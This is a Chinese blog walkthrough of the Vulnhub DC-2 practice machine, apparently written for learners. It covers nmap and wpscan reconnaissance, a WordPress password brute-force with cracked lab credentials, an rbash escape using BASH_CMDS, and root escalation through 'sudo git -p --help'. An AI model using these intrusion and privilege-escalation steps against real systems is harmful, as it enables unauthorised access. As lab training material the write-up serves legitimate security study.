DC-2靶机解题思路

  • A+
所属分类:安全文章

说明:Vulnhub是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-2是该系列第二版,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。


下载地址:

Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip


目标机IP地址:192.168.5.138
攻击机kali IP地址:192.168.5.135


同网段信息收集与DC-1相同,不做过多的叙述。


*falg1


1、arp-scan  -l

DC-2靶机解题思路

2、扫描该主机开放的端口,发现开放80端口,尝试访问。访问失败,本地无法对该域名进行解析,修改host文件。

nmap -sV -p- 192.168.5.138

DC-2靶机解题思路

DC-2靶机解题思路

3、host文件修改

        vim  /etc/hosts   添加内容为:192.168.5.138    dc-2  修改后再次访问,即可。

DC-2靶机解题思路


DC-2靶机解题思路

jiDC-2靶机解题思路

进入后发现该站点为WordPressWordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统CMS)来使用。---选自百度百科以及flag1。

DC-2靶机解题思路


*flag2


根据flag1的关键字(如:cewl,password)等。

cewl介绍(Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。)

命令 cewl -h  查看cewl的用法。

根据提示使用cewl来爬取密码。

cewl -w DcPassword.txt http://dc-2  

收集238条密码。

DC-2靶机解题思路

目录遍历,找到后台登陆页面。

python3.8 dirsearch.py -u "http://dc-2" -e*

DC-2靶机解题思路

访问登陆页面。

DC-2靶机解题思路

使用WPScan工具扫描网站,并对用户名进行扫描。

WPScanWPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。

wpscan --url http://dc-2/ -e u 

爆出3位用户,admin,jerry,tom

DC-2靶机解题思路

DC-2靶机解题思路

使用WPScan进行爆破。

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

DC-2靶机解题思路

登陆后台在Pages里找到flag2

DC-2靶机解题思路

DC-2靶机解题思路


*flag3


flag2提示要换一个入口,在扫描时发现对方的ssh服务正在开启中,端口为7744尝试连接。尝试连接,

ssh [email protected] -p 7744 指定端口连接,用户为tom(名字好记)。

DC-2靶机解题思路

当登陆成功找到flag3。

DC-2靶机解题思路

发现无法执行命令,命令执行受限制。

DC-2靶机解题思路

rbash 受限 百度一下解释如下:rbash就是受限制的bash,一般管理员会限制很多命令,例如whoami cd cat等很多常用的命令,不过肯定会有命令可以使用,我们可以查看$PATH有哪些,或者自己挨个试。

    1、echo $PATH #查看自己可以使用的命令

        

DC-2靶机解题思路



        2、echo /home/tom/usr/bin/* #查看可执行的命令

            

DC-2靶机解题思路

vi对flag3文件进行查看。

DC-2靶机解题思路

注:对"rbash"逃逸有兴趣了解,可以共同探讨。


*flag4


flag3提示我们要切换用户Jerry,下一步对jerry进行切换。开启新的shell发起连接,发现无法连接,还是要进行rbash逃逸噗噗噗,不太明白这东西的原理那就百度好了。

DC-2靶机解题思路

BASH_CMDS[a]=/bin/sh;a  

    /bin/bash

export PATH=$PATH:/bin

DC-2靶机解题思路

成功逃逸。

切换用户,连接成功。切换到jerry的家目录发现flag4

DC-2靶机解题思路

DC-2靶机解题思路

flag4提示我们还没有结束,提示关键字有git,git是一个开源分布式的控制系统。

sudo 用来以其他身份来执行命令,预设的身份是root。

sudo -l  #列出目前用户可执行与无法执行的指令。该用户不需要root密码,以root权限来执行git。

通过git缓冲区漏洞进行提权。
git -h 选项中 有一项-p | --paginate这个-p的意思就是以分页的形式展示git的帮助信息,但是这里他会默认调用more来进行展示。

DC-2靶机解题思路

sudo git -p --help

!/bin/bash 提权成功。

DC-2靶机解题思路


参考链接:https://www.bilibili.com/read/cv7955909/

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

DC-2靶机解题思路

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

DC-2靶机解题思路


本文始发于微信公众号(thelostworld):DC-2靶机解题思路

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: